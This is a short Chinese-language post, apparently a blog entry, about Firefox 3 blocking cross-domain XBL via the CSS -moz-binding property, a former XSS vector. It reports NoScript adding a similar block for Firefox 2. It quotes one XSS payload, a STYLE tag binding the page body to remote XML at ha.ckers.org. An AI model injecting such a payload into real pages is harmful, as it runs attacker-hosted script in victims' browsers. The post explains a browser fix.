在firefox中,一直被用做style里进行xss的

<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>

在ff3中被remove了,这个url后面的xml类似于ie里的htc文件,已经不能跨域了,而在ff2中,noscript学习了ff3这个特性,也进行了类似的处理.以后在firefox里的xss又少一个利用的地方了

jno又说了一个好消息,这个xml不像htc那样限制后缀名,但是这个好消息跟上面这个坏消息比也算不了什么好消息啊.....也许有饶过的方法,但是既然firefox想修复这个,那么估计存活时间都不会太长.

日.